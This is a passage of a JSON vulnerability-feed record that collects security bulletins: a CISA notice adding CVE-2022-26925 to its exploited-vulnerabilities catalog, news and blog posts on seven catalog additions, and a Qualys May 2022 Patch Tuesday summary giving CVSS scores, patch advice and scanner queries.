"vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-07-02T13:56:44", "description": "CISA has added one new vulnerability to its [Known Exploited Vulnerabilities 
Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. **Note:** To view the newly added vulnerabilities in the catalog, click on the arrow in the \"Date Added to Catalog\" column, which will sort by descending dates.\n\n**Note:** CISA previously added today\u2019s addition, CVE-2022-26925, to the KEV Catalog and then removed it after determining that remediations associated with this vulnerability would break certificate authentication for many federal agencies. Details:\n\n * CVE-2022-26925 was mitigated by Microsoft\u2019s June 2022 Patch Tuesday update. \n * The Microsoft update also includes remediations for CVE-2022-26923 and CVE-2022-26931, which change the way certificates are mapped to accounts in Active Directory. These changes break certificate authentication for many federal agencies.\n * For this reason, CISA has also published a [Knowledge Article](<https://www.cisa.gov/guidance-applying-june-microsoft-patch>) that provides critical steps that must be followed to prevent service outages. Agencies should review this [Knowledge Article](<https://www.cisa.gov/guidance-applying-june-microsoft-patch>) carefully before beginning the mitigation process.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. 
See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n \nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/07/01/cisa-adds-one-known-exploited-vulnerability-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-01T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability to Catalog ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26931"], "modified": "2022-07-01T00:00:00", "id": "CISA:B55BB602515A4C4A2D3C252B1A8C9767", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/07/01/cisa-adds-one-known-exploited-vulnerability-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-09-23T16:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjs8JaMOY9R6lUtMUspyaZkXpTsX4qNnhcrHTL9mWH5ZNa5vmozYX5_wadmPyK4zvGOflysK8-kmfWEodQkGRkX2S6SRc2Rz3Mmc6gZULQMoM1NWsDnbyPfI1hCtqNvHLJGrpMX5ei4CIFAfpq-ihMIXLWrMaa-7Q5NtgXCuo8GX35xntkWn95YjMu2/s728-e100/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday moved to add a [critical SAP security flaw](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/18/cisa-adds-seven-known-exploited-vulnerabilities-catalog>) to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation.\n\nThe issue in question is [CVE-2022-22536](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>), which has received the highest possible risk score of 10.0 on the CVSS vulnerability scoring system and was addressed by SAP as part of its Patch Tuesday updates for February 2022.\n\nDescribed as an HTTP request smuggling vulnerability, the shortcoming impacts the following product versions -\n\n * SAP Web Dispatcher (Versions - 7.49, 7.53, 7.77, 7.81, 7.85, 7.22EXT, 7.86, 7.87)\n * SAP Content Server (Version - 7.53)\n * SAP NetWeaver and ABAP Platform (Versions - KERNEL 7.22, 8.04, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, KRNL64UC 8.04, 7.22, 7.22EXT, 7.49, 7.53, KRNL64NUC 7.22, 7.22EXT, 7.49)\n\n\"An unauthenticated attacker can prepend a victim's request with 
arbitrary data, allowing for function execution impersonating the victim or poisoning intermediary web caches,\" CISA said in an alert.\n\n\"A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,\" Onapsis, which [discovered](<https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities>) the flaw, [notes](<https://onapsis.com/threat-report/icmad-sap-vulnerabilities>). \"Consequently, this makes it easy for attackers to exploit it and more challenging for security technology such as firewalls or IDS/IPS to detect it (as it does not present a malicious payload).\"\n\nAside from the SAP weakness, the agency added new flaws disclosed by Apple ([CVE-2022-32893 and CVE-2022-32894](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>)) and Google ([CVE-2022-2856](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>)) this week as well as previously documented Microsoft-related bugs ([CVE-2022-21971](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21971>) and [CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>)) and a remote code execution vulnerability in Palo Alto Networks PAN-OS ([CVE-2017-15944](<https://nvd.nist.gov/vuln/detail/CVE-2017-15944>), CVSS score: 9.8) that was disclosed in 2017.\n\nCVE-2022-21971 (CVSS score: 7.8) is a remote code execution vulnerability in Windows Runtime that was resolved by Microsoft in February 2022. 
CVE-2022-26923 (CVSS score: 8.8), fixed in May 2022, relates to a privilege escalation flaw in Active Directory Domain Services.\n\n\"An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System,\" Microsoft describes in its advisory for CVE-2022-26923.\n\nThe CISA notification, as is traditionally the case, is light on technical details of in-the-wild attacks associated with the vulnerabilities so as to avoid threat actors taking further advantage of them.\n\nTo mitigate exposure to potential threats, Federal Civilian Executive Branch (FCEB) agencies are mandated to apply the relevant patches by September 8, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-20T14:19:00", "type": "thn", "title": "CISA Adds 7 New Actively Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15944", "CVE-2022-21971", "CVE-2022-22536", "CVE-2022-26923", "CVE-2022-2856", "CVE-2022-32893", "CVE-2022-32894"], "modified": "2022-09-23T13:13:33", "id": "THN:221BD04ADD3814DC78AF58DFF41861F3", "href": "https://thehackernews.com/2022/08/cisa-adds-7-new-actively-exploited.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-08-23T00:02:12", "description": "On Thursday, CISA (the US Cybersecurity and Infrastructure Security Agency) updated [its catalog of actively exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) by adding seven new entries. These flaws were found in Apple, Google, Microsoft, Palo Alto Networks, and SAP products. CISA set the due date for everyone to patch the weaknesses by September 8, 2022.\n\nCVE-2022-22536, an SAP flaw with the highest risk score of 10, is one of the seven. We wrote about it in February, and thankfully, SAP addressed the issue fairly quickly, too, by issuing a patch. CISA even mentioned that if customers fail to patch CVE-2022-22536, they could be exposed to ransomware attacks, data theft, financial fraud, and other business disruptions that'd cost them millions.\n\n[**CVE-2022-32893**](<https://cve.report/CVE-2022-32893>) and [**CVE-2022-32894**](<https://cve.report/CVE-2022-32894>), the two zero-day, out-of-bounds write vulnerabilities affecting iOS, iPadOS, and macOS, continue to [headline](<https://www.malwarebytes.com/blog/news/2022/08/urgent-update-for-macos-and-ios-two-actively-exploited-zero-days-fixed>) as of this writing. These are serious flaws that, if left unpatched, could allow anyone to take control of vulnerable Apple systems. 
Apple already released fixes for these from the following support pages:\n\n * [About the security content of iOS 15.6.1 and iPadOS 15.6.1](<https://support.apple.com/en-gb/HT213412>)\n * [About the security content of macOS Monterey 12.5.1](<https://support.apple.com/en-gb/HT213413>)\n * [About the security content of Safari 15.6.1](<https://support.apple.com/en-us/HT213414>)\n\nThe Google Chrome flaw with high severity, **[CVE-2022-2856](<https://www.malwarebytes.com/blog/news/2022/08/update-chrome-now-google-issues-patch-for-zero-day-spotted-in-the-wild>)**, is also [confirmed](<https://www.forbes.com/sites/daveywinder/2022/08/20/google-confirms-chrome-zero-day-5-as-attacks-begin-update-now/>) to be targeted by hackers. As with other zero-days, technical details about it are light, but the [advisory](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html>) states that the flaw is an \"insufficient validation of untrusted input in Intents.\" The [Intents](<https://developers.google.com/assistant/conversational/intents>) technology works in the background and is involved in processing user input or handling a system event. If this flaw is exploited, anyone could create a malicious input that Chrome may validate incorrectly, leading to arbitrary code execution or system takeover.\n\nGoogle already patched this. While Chrome should've updated automatically, it is recommended to force an update check to ensure the patch is applied.\n\nMicrosoft also has patches available for **[CVE-2022-21971](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21971>)** and **[CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>)** in February and May, respectively. The former was given an \"exploitation less likely\" probability, but that has already changed--a [proof-of-concept (PoC)](<https://www.malwarebytes.com/glossary/proof-of-concept>) has been available since March. 
PoC exploits were also made public for the latter Microsoft flaw. However, these were released after Microsoft had already pushed out a patch.\n\nPalo Alto Networks's is the oldest among the new vulnerabilities added to the catalog. Discovered in 2017, **[CVE-2017-15944](<https://nvd.nist.gov/vuln/detail/CVE-2017-15944>)** has a severity rating of 9.8 (Critical). Once exploited, attackers could perform remote code execution on affected systems. You can read more about this flaw on [Palo Alto's advisory page](<https://security.paloaltonetworks.com/CVE-2017-15944>).\n\nMalwarebytes advises readers to apply patches to these flaws if they use products of the companies we mentioned. You don't have to wait for the due date before you act.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-22T15:00:00", "type": "malwarebytes", "title": "CISA wants you to patch these actively exploited vulnerabilities before September 8", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15944", "CVE-2022-21971", "CVE-2022-22536", "CVE-2022-26923", "CVE-2022-2856", "CVE-2022-32893", "CVE-2022-32894"], 
"modified": "2022-08-22T15:00:00", "id": "MALWAREBYTES:2B7FA24A43BE3D53EA1E393BEC594625", "href": "https://www.malwarebytes.com/blog/news/2022/08/cisa-wants-you-to-patch-these-actively-exploited-vulnerabilities-before-september-8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-05-17T23:29:17", "description": "## **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 75 vulnerabilities in the May 2022 update, including one advisory ( [ADV220001](<https://msrc.microsoft.com/update-guide/vulnerability/ADV220001>)**1** ) for Azure in response to [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29972>), a publicly exposed Zero-Day Remote Code Execution (RCE) Vulnerability, and eight (8) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE) or Elevation of Privileges. This month\u2019s Patch Tuesday release includes fixes for two (2) other zero-day vulnerabilities as well: one known to be actively exploited ([CVE-2022-26925](<http://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26925>)) and the other for being publicly exposed ([CVE-2022-22713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22713>)).\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Remote Code Execution (RCE), Security Feature Bypass, and Spoofing vulnerabilities.\n\n\n\n## Notable Microsoft Vulnerabilities Patched\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-May>) covers multiple Microsoft product families, including Azure, Developer Tools, Extended Security Update (ESU), Exchange Server, Microsoft Office, and Windows. 
A total of 97 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, Security Update, and ServicingStackUpdate.\n\nThe **most urgent bug** Microsoft addressed this month is [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), a weakness in a central component of Windows security (the \u201cLocal Security Authority\u201d (LSARPC) process within Windows). CVE-2022-26925 has been publicly disclosed and it is now actively being exploited in the wild. \n\n### [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>)** | Windows LSA Spoofing Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10. \n\n_Please note that the combined CVSS score would be 9.8 when this vulnerability is chained with the noted NTLM Relay Attacks on Active Directory Certificate Services (AD CS)._ _Please see [ADV210003 Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) for additional information._\n\nThe vulnerability affects Windows 7 through 10 and Windows Server 2008 through 2022. While this vulnerability affects all servers, domain controllers should be prioritized in terms of applying security updates. After applying the security updates, please see [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) for more information on further steps that you need to take to protect your system. \n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM. This security update detects anonymous connection attempts in LSARPC and disallows it.\n\nAccording to the CVSS metric, the attack complexity is high. 
The attacker must inject themselves into the logical network path between the target and the resource requested by the victim in order to read or modify network communications. This is called a man-in-the-middle (MITM) attack.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n### **[CVE-2022-21978](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21978>) | Microsoft Exchange Server Elevation of Privilege Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.2/10.\n\nSuccessful exploitation of this vulnerability requires the attacker to be authenticated to the Exchange Server as a member of a high privileged group.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-22012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22012>)** **and [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29130>) | Windows LDAP Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn unauthenticated attacker could send a specially crafted request to a vulnerable server. Successful exploitation could result in the attacker's code running in the context of the SYSTEM account. \n\nThis vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. Systems with the default value of this policy would not be vulnerable. 
For more information, please see Microsoft's [LDAP policies](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/3f0137a1-63df-400c-bf97-e1040f055a99>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n**[CVE-2022-22017](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22017>) | Remote Desktop Client Remote Code Execution Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### **[CVE-2022-26913](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26913>) | Windows Authentication Security Feature Bypass Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.4/10.\n\nAn attacker who successfully exploited this vulnerability could carry out a Man-in-the-Middle (MITM) attack and could decrypt and read or modify TLS traffic between the client and server. 
There is no impact to the availability of the attacked machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>) | Active Directory Domain Services Elevation of Privilege Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [**CVE-2022-26937**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>)** | Windows Network File System Remote Code Execution Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nThis vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV2 and NFSV3. 
_This may adversely affect your ecosystem and should only be used as a temporary mitigation._\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [**CVE-2022-29108**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29108>)** | Microsoft SharePoint Server Remote Code Execution Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThe attacker must be authenticated and possess the permissions for page creation to be able to exploit this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [**CVE-2022-29133**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29133>)** | Windows Kernel Elevation of Privilege Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nIn this case, a successful attack could be performed from a low privilege [AppContainer](<https://docs.microsoft.com/windows/win32/secauthz/appcontainer-isolation>). The attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n## Microsoft Last But Not Least\n\nOn April 28, 2022, Microsoft released 36 vulnerabilities for Microsoft Edge (Chromium-based) including [CVE-2022-29144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29144>) which is classified as **_Important, _**and [CVE-2022-29146](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29146>) which is classified as **_Moderate_**. 
Both flaws are Elevation of Privilege vulnerabilities and have been assigned a CVSSv3.1 score of 8.3/10.\n\nOn May 6, 2022, Microsoft Build announced that there are some [Site compatibility-impacting changes coming to Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/web-platform/site-impacting-changes>) for developers. This article lists differences between the schedule of changes for Microsoft Edge versus the Chromium project, and high-impact changes that the Microsoft Edge team is tracking especially closely.\n\n* * *\n\n## Notable Adobe Vulnerabilities Patched\n\nAdobe released five (5) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 18 vulnerabilities affecting Character Animator, ColdFusion, Framemaker, InCopy, and InDesign. Of these 18 vulnerabilities, 16 are rated as **_Critical_**.\n\n* * *\n\n### [APSB22-21](<https://helpx.adobe.com/security/products/character_animator/apsb22-21.html>)** | Security Updates Available for Adobe Character Animator**\n\nThis update resolves one (1) **_Critical_** vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves a critical vulnerability. Successful exploitation could lead to arbitrary code execution. \n\n* * *\n\n### [APSB22-22](<https://helpx.adobe.com/security/products/coldfusion/apsb22-22.html>)** | Security updates available for Adobe ColdFusion**\n\nThis update resolves one (1) **_Important _**vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released security updates for ColdFusion versions 2021 and 2018. 
These updates resolve an important vulnerability that could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-23](<https://helpx.adobe.com/security/products/indesign/apsb22-23.html>)** | Security Update Available for Adobe InDesign**\n\nThis update resolves three (3) **_Critical _**vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe InDesign. This update addresses critical vulnerabilities. Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-27](<https://helpx.adobe.com/security/products/framemaker/apsb22-27.html>)** | Security Updates Available for Adobe Framemaker**\n\nThis update resolves nine (9) **_Critical _**and one (1)_ **Important **_vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Framemaker. This update addresses one important and multiple critical vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leaks.\n\n* * *\n\n### [APSB22-28](<https://helpx.adobe.com/security/products/incopy/apsb22-28.html>)** | Security Update Available for Adobe InCopy**\n\nThis update resolves three (3) **_Critical _**vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe InCopy. This update addresses critical vulnerabilities. Successful exploitation could lead to arbitrary code execution. 
\n\n## About Qualys Patch Tuesday\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`50120` OR qid:`91894` OR qid:`91895` OR qid:`91896` OR qid:`91897` OR qid:`91898` OR qid:`91899` OR qid:`91900` OR qid:`91901` OR qid:`91903` OR qid:`91904` OR qid:`91905` OR qid:`91906` OR qid:`110407` OR qid:`110408` OR qid:`376584` )\n\n\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday:\n \n \n ( qid:`50120` OR qid:`91894` OR qid:`91895` OR qid:`91896` OR qid:`91897` OR qid:`91898` OR qid:`91899` OR qid:`91900` OR qid:`91901` OR qid:`91903` OR qid:`91904` OR qid:`91905` OR qid:`91906` OR qid:`110407` OR qid:`110408` OR qid:`376584` )\n\n\n\n* * *\n\n## \nQualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. 
\n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n* * *\n\n**1** Please visit [Qualys Threat Protection Blog](<https://threatprotect.qualys.com/2022/05/10/microsoft-releases-patch-for-the-third-party-odbc-driver-remote-code-execution-vulnerability-cve-2022-29972/>) for additional information about Microsoft Advisory ADV220001.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T19:29:16", "type": "qualysblog", "title": "May 2022 Patch Tuesday | Microsoft Releases 75 Vulnerabilities with 8 Critical; Adobe Releases 5 Advisories, 18 Vulnerabilities with 16 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21978", "CVE-2022-22012", "CVE-2022-22017", "CVE-2022-22713", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26937", "CVE-2022-29108", "CVE-2022-29130", "CVE-2022-29133", "CVE-2022-29144", "CVE-2022-29146", "CVE-2022-29972"], "modified": "2022-05-10T19:29:16", "id": "QUALYSBLOG:7BB591052411447A2B315456D50D258C", "href": 
